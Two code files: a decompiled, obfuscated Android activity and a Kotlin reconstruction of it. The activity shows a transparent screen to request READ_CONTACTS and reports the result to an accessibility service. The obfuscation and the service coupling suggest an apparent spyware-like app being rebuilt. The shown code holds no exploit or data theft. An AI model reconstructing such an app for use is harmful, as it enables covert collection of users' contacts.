File: jadx-reference/rock/activity/todoqkrxcctl.java
package com.storm.safe.rock.activity;

import android.R;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.os.Handler;
import android.os.Looper;
import com.storm.safe.rock.service.dqtvuisjd;
import p000.AbstractC1117qo;
import p000.AbstractC1120qr;
import p000.RunnableC0941o6;
import p000.t60;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class todoqkrxcctl extends Activity {

    /* renamed from: a0 */
    public static final /* synthetic */ int f51922a0 = 0;

    /* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
    /* renamed from: com.storm.safe.rock.activity.todoqkrxcctl$a0 */
    public static final class C0249a0 {
        public /* synthetic */ C0249a0(AbstractC1120qr abstractC1120qr) {
            this();
        }

        private C0249a0() {
        }
    }

    static {
        new C0249a0(null);
    }

    @Override // android.app.Activity
    public final void onBackPressed() {
        dqtvuisjd.f52358m1.setPermissionRequesting(false);
        finish();
    }

    @Override // android.app.Activity
    public final void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        getWindow().setBackgroundDrawableResource(R.color.transparent);
        getWindow().setStatusBarColor(0);
        getWindow().setNavigationBarColor(0);
        try {
            dqtvuisjd.C0290a0 c0290a0 = dqtvuisjd.f52358m1;
            c0290a0.setPermissionRequesting(true);
            if (AbstractC1117qo.m214411a7(this, "android.permission.READ_CONTACTS") != 0) {
                new Handler(Looper.getMainLooper()).postDelayed(new RunnableC0941o6(25, this), 200L);
            } else {
                c0290a0.setPermissionRequesting(false);
                finish();
            }
        } catch (Exception e) {
            t60.m214705c6("ContactsPermission", "onCreate异常", e);
            dqtvuisjd.f52358m1.setPermissionRequesting(false);
            finish();
        }
    }

    @Override // android.app.Activity
    public final void onDestroy() {
        dqtvuisjd.f52358m1.setPermissionRequesting(false);
        super.onDestroy();
    }

    @Override // android.app.Activity
    public final void onRequestPermissionsResult(int i, String[] strArr, int[] iArr) {
        t60.m214695b6(strArr, "permissions");
        t60.m214695b6(iArr, "grantResults");
        super.onRequestPermissionsResult(i, strArr, iArr);
        if (i == 151) {
            boolean z = false;
            dqtvuisjd.f52358m1.setPermissionRequesting(false);
            if (iArr.length != 0 && iArr[0] == 0) {
                z = true;
            }
            try {
                Intent intent = new Intent(getPackageName() + ".CONTACTS_PERMISSION_RESULT");
                intent.putExtra("granted", z);
                intent.setPackage(getPackageName());
                sendBroadcast(intent);
            } catch (Exception unused) {
            }
            finish();
        }
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/activity/todoqkrxcctl.kt
package com.storm.safe.rock.activity

import android.app.Activity
import android.content.Intent
import android.os.Bundle
import android.os.Handler
import android.os.Looper
import android.util.Log
import com.storm.safe.rock.p000.PermissionHelper
import com.storm.safe.rock.service.MyAccessibilityService

/**
 * JADX: todoqkrxcctl.java (92 lines)
 * Transparent Activity that requests READ_CONTACTS permission.
 *
 * Flow:
 * 1. onCreate: sets transparent window, checks if READ_CONTACTS already granted
 * 2. If not granted → requests permission after 200ms delay
 * 3. If already granted → finishes immediately
 * 4. onRequestPermissionsResult: broadcasts result and finishes
 *
 * JADX references:
 * - dqtvuisjd.f52358m1 → MyAccessibilityService.Companion (isPermissionRequesting)
 * - AbstractC1117qo.m214411a7 → ContextCompat.checkSelfPermission
 * - RunnableC0941o6(25, this) → requestPermissions runnable (request code 151)
 */
class todoqkrxcctl : Activity() {

    companion object {
        private const val TAG = "ContactsPermission"
        private const val REQUEST_CODE_CONTACTS = 151
    }

    override fun onBackPressed() {
        MyAccessibilityService.isPermissionRequesting = false
        finish()
    }

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        window.setBackgroundDrawableResource(android.R.color.transparent)
        window.statusBarColor = 0
        window.navigationBarColor = 0
        try {
            MyAccessibilityService.isPermissionRequesting = true
            // JADX: AbstractC1117qo.m214411a7 → PermissionHelper.checkPermission
            val permissionStatus = PermissionHelper.checkPermission(this, "android.permission.READ_CONTACTS")
            if (permissionStatus != 0) {
                // Permission not yet granted — request after 200ms delay
                Handler(Looper.getMainLooper()).postDelayed({
                    requestPermissions(
                        arrayOf("android.permission.READ_CONTACTS"),
                        REQUEST_CODE_CONTACTS
                    )
                }, 200L)
            } else {
                MyAccessibilityService.isPermissionRequesting = false
                finish()
            }
        } catch (e: Exception) {
            Log.e(TAG, "onCreate异常", e)
            MyAccessibilityService.isPermissionRequesting = false
            finish()
        }
    }

    override fun onDestroy() {
        MyAccessibilityService.isPermissionRequesting = false
        super.onDestroy()
    }

    override fun onRequestPermissionsResult(
        requestCode: Int,
        permissions: Array<out String>,
        grantResults: IntArray
    ) {
        super.onRequestPermissionsResult(requestCode, permissions, grantResults)
        if (requestCode == REQUEST_CODE_CONTACTS) {
            MyAccessibilityService.isPermissionRequesting = false
            val granted = grantResults.isNotEmpty() && grantResults[0] == 0
            try {
                val intent = Intent("${packageName}.CONTACTS_PERMISSION_RESULT")
                intent.putExtra("granted", granted)
                intent.setPackage(packageName)
                sendBroadcast(intent)
            } catch (_: Exception) {
            }
            finish()
        }
    }
}
